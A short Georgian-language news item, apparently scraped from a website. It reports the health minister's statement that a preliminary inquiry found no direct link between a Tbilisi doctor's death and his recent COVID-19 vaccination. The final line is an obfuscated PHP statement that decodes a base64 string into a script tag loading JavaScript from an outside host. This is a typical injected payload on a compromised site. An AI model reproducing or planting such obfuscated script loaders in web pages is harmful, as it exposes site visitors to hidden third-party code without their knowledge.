celsiusi
ავერსი საქკაბელი
თბილისში 52 წლის ექიმის გარდაცვალების შესახებ პირველად ინფორმაციას ჯანდაცვის მინისტრი ეკატერინე ტიკარაძე ავრცელებს.
 
როგორც ტიკარაძემ აღნიშნა, პირველად მოკვლევაზე დაყრდნობით “მედკაპიტალის“ ექიმის გარდაცვალება კორონავირუსის საწინააღმდეგო აცრას არ უკავშირდება.
 
“რეგულირების სააგენტო ამ წუთებში იმყოფება ადგილზე, თუმცა პირველადი მოკვლევით პირდაპირი კავშირი აცრასა და გარდაცვალებას შორის ამ ეტაპზე დადგენილი არ არის. მიმდინარეობს მოკვლევა. მოგვიანებით გვეცოდინება ინფორმაცია“, - განაცხადა ეკატერინე ტიკარაძემ.
 
“მედკაპიტალის“ ექიმმა კორონავირუსზე აცრა ორი კვირის წინ გაიკეთა, თუმცა კლინიკა მის გარდაცვალებასთან ვაქცინაციის კავშირს გამორიცხავს. ცნობილია, რომ ექიმს გულის იშემიური დაავადება ჰქონდა.
 
1566
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");